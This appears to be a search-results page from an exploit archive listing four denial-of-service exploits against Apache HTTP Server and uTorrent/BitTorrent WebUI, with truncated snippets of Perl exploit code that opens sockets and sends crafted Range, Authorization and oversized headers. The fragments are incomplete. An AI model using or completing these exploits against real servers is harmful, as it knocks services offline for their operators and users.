24 matches found
Apache Range Header DoS (Apache Killer)
The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service memory and CPU consumption via a Range header that expresses multiple overlapping ranges, exploit called "Apache Killer". Module Options msf use...
uTorrent WebUI <= v0.370 Authorization header DoS Exploit
Exploit for windows platform in category dos / poc ========================================================= uTorrent WebUI newPeerAddr =$ARGV0,PeerPort =$ARGV1,Proto = 'tcp'; print $sock "GET / HTTP/1.1\r\n". "Authorization: Basic $nonbase64\r\n\r\n"; 0day.today 2017-12-31...
uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit
No description provided by source. !/usr/bin/perl uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service exploit according to the following advisory: http://secunia.com/advisories/30605 usage: WebUI-dos.pl url port user:pass Exploit written by Exodus. http://www.blackhat.org....
Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service
/usr/bin/perl -w use IO::Socket::INET; usage unless @ARGV == 2; my $host = shift@ARGV; my $port = shift@ARGV; sub usage print "\n"; print "\n Apache HTTPd Arbitrary Long HTTP Headers DoS \n"; print " Tested Versions : 2 newproto='tcp', PeerAddr=$host, PeerPort=$port; $socket or die "Cannot connec...